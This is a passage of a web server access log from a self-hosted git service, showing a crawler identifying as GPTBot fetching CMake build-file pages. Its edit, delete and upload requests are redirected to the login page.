+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11781] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10781] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9862] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 961] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9836] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:47:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14877] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:47:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11322] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9848] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:47:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 911] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21945] [Gzip 14.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9848] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 